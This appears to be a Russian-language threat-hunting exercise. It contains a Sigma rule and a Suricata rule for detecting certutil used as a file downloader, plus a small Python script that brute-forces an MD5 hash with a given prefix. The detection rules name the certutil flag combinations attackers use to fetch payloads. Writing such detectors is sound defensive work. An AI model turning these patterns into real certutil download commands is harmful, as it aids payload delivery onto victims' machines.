# 3. Threat Hunting. Анализ действий злоумышленников ## 3.1 Детект по событиям. Синтаксис Sigma. ```yaml= title: Certutil download command id: 8153c26e-8f54-424c-bc7d-7b993dca2c83 status: experimental description: Detects suspicious a certutil command that used to download files references: - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil author: Oleg Zhulin date: 2022/09/30 modified: 2022/10/02 tags: - attack.command_and_control - attack.ingress_tool_transfer - attack.t1105 logsource: category: process_creation product: windows detection: selection1: Image|endswith: '\certutil.exe' CommandLine|contains|all: - '-f' - '-urlcache' - '-split' selection2: Image|endswith: '\certutil.exe' CommandLine|contains|all: - '-verifyctl' - '-f' - '-split' condition: selection1 or selection2 falsepositives: - unknown level: medium ``` ## 3.2 Сетевой детект. Ситаксис Suricata ```shell= alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Certutil download command"; content:"GET"; http_method; content:"Certutil URL Agent"; http_user_agent; sid:100001; rev:1; metadata:created_at 2022_09_30, updated_at 2022_10_02;) ``` ## 3.3 Программа генерации md5-хеша по паттерну ```python= import hashlib def get_hash_with_pattern(start_pattern): result = {} current_codes_symbols = 0 while True: text_string = str(current_codes_symbols) current_hash = hashlib.md5(text_string.encode('ascii')).hexdigest() if current_hash[:len(start_pattern)] == start_pattern: result['text_string'] = text_string result['md5_hash'] = current_hash break current_codes_symbols = current_codes_symbols + 1 return result if __name__ == "__main__": print(get_hash_with_pattern("afed")) ```